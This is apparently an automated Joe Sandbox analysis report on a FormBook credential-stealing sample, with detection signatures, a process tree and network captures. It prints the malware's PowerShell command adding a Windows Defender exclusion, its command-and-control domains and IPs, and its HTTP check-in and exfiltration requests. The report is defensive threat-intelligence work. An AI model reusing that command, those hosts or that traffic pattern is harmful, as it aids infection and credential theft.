Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SW_48912.scr.exe

Overview

General Information

Sample name:SW_48912.scr.exe
Analysis ID:1580361
MD5:b4c5a379d38312666805d0d33e2801b7
SHA1:562aeee42c55410fbc2935cc9879236390ee8944
SHA256:77bd5b8fde14dc292c27e9526ee5c4d33b557d936deae82fa7abb3e768a74c3b
Tags:exescruser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SW_48912.scr.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\SW_48912.scr.exe" MD5: B4C5A379D38312666805D0D33E2801B7)
    • powershell.exe (PID: 3084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4108 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • SW_48912.scr.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\SW_48912.scr.exe" MD5: B4C5A379D38312666805D0D33E2801B7)
      • kygSlzwdnMXWUy.exe (PID: 5296 cmdline: "C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 2812 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • kygSlzwdnMXWUy.exe (PID: 1228 cmdline: "C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7056 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.SW_48912.scr.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.SW_48912.scr.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_48912.scr.exe", ParentImage: C:\Users\user\Desktop\SW_48912.scr.exe, ParentProcessId: 7084, ParentProcessName: SW_48912.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", ProcessId: 3084, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_48912.scr.exe", ParentImage: C:\Users\user\Desktop\SW_48912.scr.exe, ParentProcessId: 7084, ParentProcessName: SW_48912.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", ProcessId: 3084, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_48912.scr.exe", ParentImage: C:\Users\user\Desktop\SW_48912.scr.exe, ParentProcessId: 7084, ParentProcessName: SW_48912.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe", ProcessId: 3084, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T11:36:03.324390+010020507451Malware Command and Control Activity Detected192.168.2.449743104.21.10.2680TCP
                2024-12-24T11:36:28.480173+010020507451Malware Command and Control Activity Detected192.168.2.44978145.41.206.5780TCP
                2024-12-24T11:36:43.245455+010020507451Malware Command and Control Activity Detected192.168.2.449820199.59.243.22780TCP
                2024-12-24T11:36:58.016186+010020507451Malware Command and Control Activity Detected192.168.2.449857162.0.236.16980TCP
                2024-12-24T11:37:13.072050+010020507451Malware Command and Control Activity Detected192.168.2.449896199.59.243.22780TCP
                2024-12-24T11:37:27.821198+010020507451Malware Command and Control Activity Detected192.168.2.449933199.59.243.22780TCP
                2024-12-24T11:37:43.688311+010020507451Malware Command and Control Activity Detected192.168.2.44997147.83.1.9080TCP
                2024-12-24T11:37:59.023203+010020507451Malware Command and Control Activity Detected192.168.2.450012104.21.80.180TCP
                2024-12-24T11:38:14.539915+010020507451Malware Command and Control Activity Detected192.168.2.45004185.159.66.9380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-24T11:36:26.211792+010028563181A Network Trojan was detected192.168.2.44977545.41.206.5780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: SW_48912.scr.exeReversingLabs: Detection: 42%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SW_48912.scr.exeJoe Sandbox ML: detected
                Source: SW_48912.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: SW_48912.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sdchange.pdbGCTL source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kygSlzwdnMXWUy.exe, 00000009.00000000.1963179384.000000000070E000.00000002.00000001.01000000.0000000D.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3538501337.000000000070E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SW_48912.scr.exe, SW_48912.scr.exe, 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 0000000A.00000003.2042250826.00000000044B8000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000003.2040130480.0000000004302000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdchange.pdb source: SW_48912.scr.exe, 00000005.00000002.2040144859.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 00000009.00000002.3538929854.0000000000E68000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0271C3C0 FindFirstFileW,FindNextFileW,FindClose,10_2_0271C3C0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then xor eax, eax10_2_02709E20
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then mov ebx, 00000004h10_2_045704EE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49775 -> 45.41.206.57:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49743 -> 104.21.10.26:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49820 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49781 -> 45.41.206.57:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49857 -> 162.0.236.169:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49933 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49971 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 104.21.80.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50041 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49896 -> 199.59.243.227:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.letsbookcruise.xyz
                Source: DNS query: www.letsbookcruise.xyz
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: Joe Sandbox ViewIP Address: 85.159.66.93 85.159.66.93
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: WEB2OBJECTSUS WEB2OBJECTSUS
                Source: Joe Sandbox ViewASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bgezakofe.shopConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.techstarllc.cloudConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hokasportshoes.shopConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.primetream.liveConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sorket.techConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.1337street.shopConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cruycq.infoConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dejikenkyu.cyouConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficHTTP traffic detected: GET /uwne/?APatc2S=vL36CH4RwprLmNwp4Gj6N9R+COmNcwDQlAQSHXNI75nLvOBtYNcxpRKkkR/hR1fY7vPFiFbrOB3asJH5t0/H0b+173/mnxpr58pFYDtgi19qUSBoNlsW/NI=&3FNHL=wVCtFrFXof HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.letsbookcruise.xyzConnection: closeUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                Source: global trafficDNS traffic detected: DNS query: www.bgezakofe.shop
                Source: global trafficDNS traffic detected: DNS query: www.techstarllc.cloud
                Source: global trafficDNS traffic detected: DNS query: www.hokasportshoes.shop
                Source: global trafficDNS traffic detected: DNS query: www.primetream.live
                Source: global trafficDNS traffic detected: DNS query: www.sorket.tech
                Source: global trafficDNS traffic detected: DNS query: www.1337street.shop
                Source: global trafficDNS traffic detected: DNS query: www.cruycq.info
                Source: global trafficDNS traffic detected: DNS query: www.dejikenkyu.cyou
                Source: global trafficDNS traffic detected: DNS query: www.letsbookcruise.xyz
                Source: global trafficDNS traffic detected: DNS query: www.stoauto.pro
                Source: unknownHTTP traffic detected: POST /phws/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techstarllc.cloudOrigin: http://www.techstarllc.cloudReferer: http://www.techstarllc.cloud/phws/Connection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16Data Raw: 41 50 61 74 63 32 53 3d 6c 65 31 59 61 64 6d 78 62 43 79 4c 39 2b 76 34 55 45 64 47 31 43 38 6d 79 69 5a 6c 78 52 56 6d 75 6a 44 34 79 62 45 45 4e 78 4f 57 35 57 2b 6f 61 49 74 68 58 49 6a 39 33 67 57 32 50 49 38 6a 76 50 6b 57 68 31 4a 54 4b 65 59 35 46 4c 50 6a 65 36 48 6a 7a 4a 30 6a 57 62 7a 49 51 62 79 48 50 36 46 63 76 32 4d 52 45 46 7a 70 30 59 38 66 2b 6a 45 61 44 2b 4a 71 48 4c 78 64 30 66 6e 61 4b 59 52 4a 4a 61 73 6b 32 34 58 77 30 4a 51 36 47 2f 2b 4f 64 66 75 6a 6c 78 32 48 6b 35 73 61 77 4b 51 55 67 6b 4e 6a 6c 6b 36 4e 6e 69 67 37 51 70 4d 33 49 7a 4a 33 57 4a 59 66 4f 53 38 46 70 51 3d 3d Data Ascii: APatc2S=le1YadmxbCyL9+v4UEdG1C8myiZlxRVmujD4ybEENxOW5W+oaIthXIj93gW2PI8jvPkWh1JTKeY5FLPje6HjzJ0jWbzIQbyHP6Fcv2MREFzp0Y8f+jEaD+JqHLxd0fnaKYRJJask24Xw0JQ6G/+Odfujlx2Hk5sawKQUgkNjlk6Nnig7QpM3IzJ3WJYfOS8FpQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 10:36:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZsQ0gaNf%2Fa1z2bvPwVStYfp19GJV5vM5uN6w3rQk08xy970kOa45GktnFXKL9h2dkmjmuHCMGVIej2lkjTXl9S149uKjFMJjqKjbkjIoU8Gew6RS2eOfA9HLxY9XuF%2BqonNmLDg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f6ff2b71d3c18f6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1630&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 24 Dec 2024 10:36:20 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
